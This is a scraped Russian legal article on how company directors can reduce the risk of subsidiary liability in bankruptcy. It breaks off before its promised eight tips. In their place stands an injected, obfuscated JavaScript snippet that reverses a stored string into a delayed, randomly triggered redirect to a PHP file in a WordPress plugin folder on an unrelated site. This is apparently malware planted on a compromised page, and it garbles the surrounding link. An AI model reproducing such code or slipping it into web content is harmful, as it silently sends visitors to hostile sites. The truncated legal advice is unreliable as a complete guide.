Компания в кризисе. 8 советов директору, как защититься от субсидиарки

Обзор Вадима Бородкина, советника Orchards, для PROбанкротство.

Важные вопросы привлечения контролирующих лиц к субсидиарной ответственности основываются на законодательных презумпциях, установление которых часто приводит привлекаемых лиц к состоянию безысходности, когда опровергнуть презумпции практически невозможно.

Именно поэтому правоприменительная практика беспощадно относится к директорам компаний-банкротов, учитывая презумпции, помогающие управляющим и кредиторам привлекать к субсидиарной ответственности контролирующих должника лиц.

В этой связи каждый директор, вступая в должность, должен осознавать риск своего привлечения к субсидиарной ответственности. 

Для минимизации риска директору быть привлеченным к субсидиарной ответственности мы подготовили восемь советов (условно назовем «антисубсидиарной гигиеной»), которые также будут полезны и для исключения риска привлечения к ординарной ответственности в виде возмещения убытков обществу на основании ст. 53.1 ГК РФ.

При этом, поскольку закон о банкротстве выделяет два базовых основания для привлечения к субсидиарной ответственности, а именно за невозможность полного погашения требований кредиторов и за неподачу (несвоевременную подачу) заявления должника о банкротстве, далее приведем советы по каждому основанию. 

Минимизация риска привлечения директора к субсидиарной ответственности на основании ст. 61.11 ЗоБ

Данный вид ответственности наступит для директора, если полное погашение требований кредиторов стало невозможно вследствие действий и (или) бездействия директора.

Ст. 61.11 закона о банкротстве содержит пять опровержимых презумпций, установление которых предполагает, что полное погашение требований кредиторов стало невозможно вследствие действий и (или) бездействия директора.

Следовательно, для минимизации риска быть привлеченным к субсидиарной ответственности по обязательствам должника директору необходимо в своей деятельности придерживаться следующих советов.

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tov-direktoru-kak-zashhititsia-ot-subsidiarki-2459″>Ссылка на статью>>

Подпишитесь на Telegram Orchards

X